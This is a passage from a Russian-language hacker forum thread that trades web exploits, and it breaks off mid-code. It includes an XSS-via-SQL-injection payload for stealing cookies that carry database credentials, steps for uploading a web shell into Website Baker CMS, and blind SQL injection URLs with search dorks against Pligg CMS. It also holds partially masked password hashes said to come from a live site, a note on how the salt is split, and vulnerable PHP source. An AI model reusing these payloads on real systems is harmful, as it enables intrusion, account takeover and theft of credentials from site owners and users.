[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (!empty([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]]) && isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]])) {
if (@[/COLOR][COLOR="#0000BB"]mysql_connect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]DBHOST[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]])){
[/COLOR][COLOR="#0000BB"]setcookie[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"sxd"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]base64_encode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SKD101:[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]:[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location: dumper.php"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]mysql_close[/COLOR][COLOR="#007700"]();
exit;
}
[/COLOR][/COLOR]
Остается заполучить cookies админа, после того как он делал бэкап.
XSS через SQL-inj:
Код:
Code:
/static.php?str='+and+1=2+union+select+1,2,'alert(document.cookie);'+--+
В параметр sxd будет содержаться закодированный логин и пасс к бд. Алгоритм шифрования - base64.
|
|
|
|
05.11.2011, 17:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
28093
Репутация:
11
|
|
Website Baker CMS
Website Baker CMS заливка шелла, все версии
Нужна админка. Уязвимость существует из-за того, что админы этой CMS незнают, что можно *.phtml выполнять как php
1) Идем в админку:
http://www.opensourcecms.com/demo/2/68/Website_Baker
admin:demo123
2) В раздел Media
3) Переименуем наш шелл в *.phtml, т.е. wso.php => wso.phtml
4) Заливаем через форму справа(Upload file(s))
5) Получаем шелл, причем с сайта opensourcecms.com
UPD. Кто убил демку WebBaker-а? Имейте совесть...
|
|
|
|
06.11.2011, 16:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
4100
Репутация:
74
|
|
Pligg CMSv.1.2.0 (последняя) g00gle >7KK
dorki:
Pligg Content Management System
Pligg CMS
Boolean-Based vurnel
Код:
Code:
http://pligg/story.php?title=qwe' AND ORD(MID((SELECT IFNULL(CAST(COUNT(column_name) AS CHAR),CHAR(32)) FROM information_schema.COLUMNS WHERE table_name=CHAR(116,97,103,115) AND table_schema=CHAR(119,101,98,49,95,100,98,53)),2,1)) > 1 AND 'AOOt'='AOOt
Код:
Code:
http://pligg/story.php?title=qwe' AND ORD(MID((SELECT IFNULL(CAST(COUNT(column_name) AS CHAR),CHAR(32)) FROM information_schema.COLUMNS WHERE table_name=CHAR(116,97,103,115) AND table_schema=CHAR(119,101,98,49,95,100,98,53)),1,1)) > 51 AND 'AOOt'='AOOt
Код:
Code:
http://pligg/story.php?title=qwe' AND ORD(MID((SELECT IFNULL(CAST(COUNT(column_name) AS CHAR),CHAR(32)) FROM information_schema.COLUMNS WHERE table_name=CHAR(116,97,103,115) AND table_schema=CHAR(119,101,98,49,95,100,98,53)),1,1)) > 52 AND 'AOOt'='AOOt
Сообщение от None
Таблицы:
prefix: pligg_
table: users
columns: user_login,user_pass (where user_level='god')
Сообщение от None
www.proprofs.com
Alexa 10K (~100K unikov)
Код:
Code:
god, ***************809b221f581cdbba8c1489e******
james, ****************91acf54adcea0b79a79d******
gsbaghel, ***************f5ecb878f4d045e5306c2413c******
С хэшами тут так:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]generateHash[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$plainText[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$salt[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"]){
if ([/COLOR][COLOR="#0000BB"]$salt[/COLOR][COLOR="#007700"]===[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$salt[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]uniqid[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]rand[/COLOR][COLOR="#007700"](),[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"])),[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]SALT_LENGTH[/COLOR][COLOR="#007700"]); }
else {
[/COLOR][COLOR="#0000BB"]$salt[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$salt[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]SALT_LENGTH[/COLOR][COLOR="#007700"]);
}
return[/COLOR][COLOR="#0000BB"]$salt[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]sha1[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$salt[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$plainText[/COLOR][COLOR="#007700"]);
}[/COLOR][/COLOR]
Вообщем отсекаем первые 9 символов хэша (из 49) - и они же являются солью в оставшихся 40 символах (уже SHA1)
Сообщение от None
Заливаемся через:
1) модули
2) редактирование тем
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$my_base_url[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]){
[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'my_base_url'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"http://"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"HTTP_HOST"[/COLOR][COLOR="#007700"]]);
if(isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action'[/COLOR][COLOR="#007700"]])){[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sanit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action'[/COLOR][COLOR="#007700"]]);}else{[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];}
[/COLOR][COLOR="#0000BB"]$pos[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strrpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"SCRIPT_NAME"[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"SCRIPT_NAME"[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$pos[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"]){[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];}
[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'my_pligg_base'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$my_pligg_base[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"];
} else {
[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'my_base_url'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$my_base_url[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'my_pligg_base'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$my_pligg_base[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'urlmethod'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$URLMethod[/COLOR][COLOR="#007700"]);
if(isset([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'template'[/COLOR][COLOR="#007700"]])){
[/COLOR][COLOR="#0000BB"]$thetemp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'..'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]sanit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'template'[/COLOR][COLOR="#007700"]]));
}
[/COLOR][COLOR="#FF8000"]// template check
[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]__FILE__[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]'/templates/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$thetemp[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/pligg.tpl"[/COLOR][COLOR="#007700"];
unset([/COLOR][COLOR="#0000BB"]$errors[/COLOR][COLOR="#007700"]);
if (![/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"])) {[/COLOR][COLOR="#0000BB"]$errors[/COLOR][COLOR="#007700"][]=[/COLOR][COLOR="#DD0000"]'You may have typed the template name wrong or "'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$thetemp[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'" does not exist. Click here to fix it.'[/COLOR][COLOR="#007700"]; }
if (isset([/COLOR][COLOR="#0000BB"]$errors[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$thetemp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"wistie"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]__FILE__[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]'/templates/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$thetemp[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/pligg.tpl"[/COLOR][COLOR="#007700"];
if (![/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"])) {echo[/COLOR][COLOR="#DD0000"]'The default Wistie template does not exist anymore. Please fix this by reuploading the Wistie template!'[/COLOR][COLOR="#007700"]; die();}
foreach ([/COLOR][COLOR="#0000BB"]$errors[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$error[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$output[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Error:[/COLOR][COLOR="#0000BB"]$error[/COLOR][COLOR="#DD0000"]\n"[/COLOR][COLOR="#007700"];
}
if ([/COLOR][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'SCRIPT_NAME'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]"admin_config.php"[/COLOR][COLOR="#007700"]) ==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'SCRIPT_NAME'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]"login.php"[/COLOR][COLOR="#007700"]) ==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]){
echo[/COLOR][COLOR="#DD0000"]"Error:[/COLOR][COLOR="#0000BB"]$error[/COLOR][COLOR="#DD0000"]\n"[/COLOR][COLOR="#007700"];
die();
}
}[/COLOR][/COLOR]
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]= isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'view'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]sanitize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'view'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]) !=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]sanitize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'view'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]) :[/COLOR][COLOR="#DD0000"]'profile'[/COLOR][COLOR="#007700"];
if ([/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]'setting'[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$truelogin[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'profile'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$page_header[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]username[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$post_title[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_config_vars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'PLIGG_Visual_Breadcrumb_Profile'[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]" | "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'user_view'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]'profile'[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]do_viewfriends[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'view_href'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'nav_pd'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]);
} else {
[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'nav_pd'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]);
}
if ([/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]'voted'[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$page_header[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]' | '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_config_vars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'PLIGG_Visual_User_NewsVoted'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$navwhere[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'text3'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_config_vars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'PLIGG_Visual_User_NewsVoted'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$post_title[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]" | "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_config_vars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'PLIGG_Visual_User_NewsVoted'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'view_href'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'voted'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'nav_nv'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]);
} else {
[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'nav_nv'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]);
}
if ([/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]'history'[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$page_header[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]' | '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_config_vars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'PLIGG_Visual_User_NewsSent'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$navwhere[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'text3'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_config_vars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'PLIGG_Visual_User_NewsSent'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$post_title[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]" | "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_config_vars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'PLIGG_Visual_User_NewsSent'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'view_href'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'submitted'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'nav_ns'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]);
} else {
[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'nav_ns'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]);
}
if ([/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]'setting'[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$usercategorysql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]table_users[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" where user_login = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]escape[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"' "[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$userresults[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_results[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$usercategorysql[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$userresults[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]object_2_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$userresults[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$get_categories[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$userresults[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'0'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'user_categories'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$user_categories[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]","[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$get_categories[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$categorysql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]table_categories[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" where category__auto_id!='0' "[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$results[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_results[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$categorysql[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$results[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]object_2_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$results[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$category[/COLOR][COLOR="#007700"]= array();
foreach([/COLOR][COLOR="#0000BB"]$results[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$category[/COLOR][COLOR="#007700"][] =[/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'category_name'[/COLOR][COLOR="#007700"]];
}
[/COLOR][COLOR="#0000BB"]$sor[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'err'[/COLOR][COLOR="#007700"]];
if([/COLOR][COLOR="#0000BB"]$sor[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$err[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"You have to select at least 1 category"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'err'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$err[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'category'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$results[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'user_category'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$user_categories[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'view_href'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'submitted'[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]Allow_User_Change_Templates[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$dir[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"templates"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$templates[/COLOR][COLOR="#007700"]= array();
foreach ([/COLOR][COLOR="#0000BB"]scandir[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$dir[/COLOR][COLOR="#007700"]) as[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"])
